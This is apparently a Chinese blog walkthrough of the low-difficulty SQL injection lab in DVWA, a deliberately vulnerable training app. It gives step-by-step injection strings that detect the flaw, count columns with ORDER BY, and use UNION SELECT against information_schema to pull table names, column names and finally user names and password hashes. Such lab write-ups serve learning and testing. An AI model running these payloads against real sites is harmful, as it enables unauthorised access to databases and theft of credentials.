这个题难搞啊,还是low里面的,废了废了,话不多说,经参考,上思路
一.先来了解知识点
1.在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。
2.group_concat将group by产生的同一个分组中的值连接起来,返回一个字符串结果。
3.information_schema数据库表说明:
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。
TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。
COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。
开始解题
1.先是可以看到一段的php代码,右下角的view source
2.然后回来判断是不是注入类型
3.是注入是什么类型
4.先是输入了一个1
页面正常
输入个1’
页面返回错误了
再来个1’ and ‘1’=‘2
查询失败了
唉
再来1’ or ‘1’='1页面正常还返回了许多信息,查询成功了
以上推断是注入(字符型注入)
5.接下来开始猜测字段(用order by)
输入个1’ or 1=1 order by 1 #
哎,竟然成功啦
这就算是有一个字段了
继续go
1’ or 1=1 order by 2#
也可以,不错不错
1’ or 1=1 order by 3 #
不中了奥,不行了
所以以上判断出只有两个字段
而且要确定一下回显点
1’ union select 1,2#
可以了解到回显点是2
6,接下来开始搞数据库
1’ union select 1,database() # (因为回显点是2)
可以得到数据库的名字是dvwa
7,继续搞他的表出来
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
可以看到得到了表的名字为guestbook,users
8,接着获取列名
1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#
得到了列名
9,这下他就必须服了,查他
1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
就🆗了
注意:字符都是英文格式下
237
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
